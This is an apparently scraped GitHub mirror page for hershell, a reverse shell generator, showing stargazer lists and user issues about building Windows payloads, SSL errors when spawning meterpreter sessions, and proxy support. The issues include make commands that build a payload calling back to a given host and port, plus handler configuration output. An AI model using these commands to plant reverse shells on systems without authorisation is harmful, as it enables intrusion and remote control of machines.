lesnuages / hershell Goto Github PK

View Code? Open in Web Editor NEW

580.0 20.0 96.0 25 KB

Multiplatform reverse shell generator

License: BSD 3-Clause "New" or "Revised" License

Makefile 11.61% Go 76.47% Dockerfile 11.92%

security exploit reverse-shell

hershell's People

Contributors

Stargazers

Watchers

Forkers

analyticsearch cybersecgit prodject khast3x gavz tobor dannymas ralfzhb sbhack xingkong123600 akimdi helterskelter5 kerlak2000 vexs1991 oksbsb sacwtv ro9ueadmin chaitanyakrishna ntgitdude23 attackgithub johndoex1 superuser5 darrynza dhoubrechts jinnu92 crackercat qsdj bigbrobro hohjgdhsj dolanor-galaxy ditoryou triplekill topotam mjgrey anonghost666 rayleeafar lxpe shizonic lubyruffy masterscott avi8892 ianwolf99 mkglock cyb3rr0nn13 koushui pentest-tools 5l1v3r1 5up3rc jimsonzhang douglas88 flywithoutwings wateroot helianghit g0tch4r marshall-hallenbeck alessiodallapiazza xn0px90 polling-repo-continua pierelucas fdlucifer 0xc0ffeee hexfocus-fork ethancck 513sec xunbu7 forever-sky xroot000 0x0000141 carlneuhaus ii0 zichong-h wizardvan metaseb madwind76 houssemeddinegherabi jeromeyoung m00nt0 asiaforest gysf666 terrorizer1980 p34t1k st0pli tnexperts kopfjager007 helkyd jackypeng66 ofalwl breaksini7 chkbr teutades bakaralisec ognz mac-lawson jmshtw

hershell's Issues

Enable to create a payload

Hi,
I'm trying to generate a windows payload but not working:
1- I install the latest version of go rm -rf /usr/local/go && tar -C /usr/local -xzf go1.21.3.linux-amd64.tar.gz
2- Add /usr/local/go/bin to the PATH

3- I did clone the repo inside /usr/local/go/bin/src/github.com/sysdream (as the go get is not used anymore with then new version)
4- $ sudo make depends --> to generate ssl is done
5. $ sudo make windows64 LHOST=192.168.30.48 LPORT=1234 --> NOT WORKING

any idea what could be a problem?

SSL Error when spawning meterpreter

I'm receiving the same error/issue as seen here using the latest release: sysdream/hershell#2

openssl s_server -cert server.pem -key server.key -accept 8083
Using default temp DH parameters
ACCEPT
-----BEGIN SSL SESSION PARAMETERS-----
MHUCAQECAgMDBALALwQg+FcZskUtPAldc5nOTKfLTeWs13giztsD+3wEZ2Mc4eIE
MDH+Q2f/9GhZ8kQRm8ZkND4pvUYWwvqnczUxcNFEtzr9yLAN1Hn7WvOHkY6WJ2ls
NaEGAgRdLBSvogQCAhwgpAYEBAEAAAA=
-----END SSL SESSION PARAMETERS-----
Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA
Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA512:ECDSA+SHA512:RSA+SHA1:ECDSA+SHA1
Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA512:ECDSA+SHA512
Supported Elliptic Curve Point Formats: uncompressed
Supported Elliptic Groups: X25519:P-256:P-384:P-521
Shared Elliptic groups: X25519:P-256:P-384:P-521

No server certificate CA names sent
CIPHER is ECDHE-RSA-AES128-GCM-SHA256
Secure Renegotiation IS supported
[hershell]> meterpreter tcp 192.168.71.120:8080
[hershell]> ERROR
shutting down SSL
CONNECTION CLOSED

Module advanced options (exploit/multi/handler):

Name Current Setting Required Description

ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
ExitOnSession false yes Return from the exploit after a session has been created
ListenerTimeout 0 no The maximum number of seconds to wait for new sessions
VERBOSE true no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 0 no Additional delay when waiting for a session

Payload advanced options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

AutoLoadStdapi AutoRunScript AutoSystemInfo AutoUnhookProcess AutoVerifySession AutoVerifySessionTimeout 30 EnableStageEncoding EnableUnicodeEncoding HandlerSSLCert InitialAutoRunScript PayloadBindPort PayloadProcessCommandLine PayloadUUIDName PayloadUUIDRaw PayloadUUIDSeed PayloadUUIDTracking PrependMigrate PrependMigrateProc ReverseAllowProxy ReverseListenerBindAddress ReverseListenerBindPort ReverseListenerComm ReverseListenerThreaded SessionCommunicationTimeout 300 SessionExpirationTimeout SessionRetryTotal SessionRetryWait StageEncoder StageEncoderSaveRegisters StageEncodingFallback StagerRetryCount StagerRetryWait VERBOSE WORKSPACE false yes Automatically load the Stdapi extension
no A script to run automatically on session creation.
false yes Automatically capture system information on initialization.
false yes Automatically load the unhook extension and unhook the process
false yes Automatically verify and drop invalid sessions
no Timeout period to wait for session validation to occur, in seconds
false no Encode the second stage payload
false yes Automatically encode UTF-8 strings as hexadecimal
server.pem no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
no An initial script to run on session creation (before AutoRunScript)
no Port to bind reverse tcp socket to on target system.
no The displayed command line that will be used by the payload
no A human-friendly name to reference this unique payload (requires tracking)
no A hex string representing the raw 8-byte PUID value for the UUID
no A string to use when generating the payload UUID (deterministic)
false yes Whether or not to automatically register generated UUIDs
false yes Spawns and runs shellcode in new process
no Process to spawn and run shellcode in
false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
no The specific IP address to bind to on the local system
no The port to bind to on the local system if different from LPORT
no The specific communication channel to use for this listener
false yes Handle every connection in a new thread (experimental)
no The number of seconds of no activity before this session should be killed
604800 no The number of seconds before this session should be forcibly shut down
3600 no Number of seconds try reconnecting for on network failure
10 no Number of seconds to wait between reconnect attempts
no Encoder to use if EnableStageEncoding is set
no Additional registers to preserve in the staged payload if EnableStageEncoding is set
true no Fallback to no encoding if the selected StageEncoder is not compatible
10 no The number of times the stager should retry if the first connect fails
5 no Number of seconds to wait for the stager between reconnect attempts
true no Enable detailed status messages
no Specify the workspace for this module

Error

hello I would like to know how to reset the following error:

root@kali:~/hershell# make windows64 LHOST=192.168.1.9 LPORT=7766
GOOS=windows GOARCH=amd64 go build --ldflags "-s -w -X main.connectString=192.168.1.9:7766 -X main.fingerPrint=$(openssl x509 -fingerprint -sha256 -noout -in server.pem | cut -d '=' -f2) -H=windowsgui" -o hershell.exe hershell.go
hershell.go:13:2: cannot find package "github.com/lesnuages/hershell/meterpreter" in any of:
/usr/lib/go-1.14/src/github.com/lesnuages/hershell/meterpreter (from $GOROOT)
/root/go/src/github.com/lesnuages/hershell/meterpreter (from $GOPATH)
hershell.go:14:2: cannot find package "github.com/lesnuages/hershell/shell" in any of:
/usr/lib/go-1.14/src/github.com/lesnuages/hershell/shell (from $GOROOT)
/root/go/src/github.com/lesnuages/hershell/shell (from $GOPATH)
make: *** [Makefile:29: windows64] Error 1**

Tanks.

connect through proxy

hi,
how can i make hershell connect through private proxy please

Reverse TCP Meterpreter

Just wanted to let you know, the reverse_tcp meterpreter's just die right after the connection is made. HTTPS works just fine, just not the tcp O_o;

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.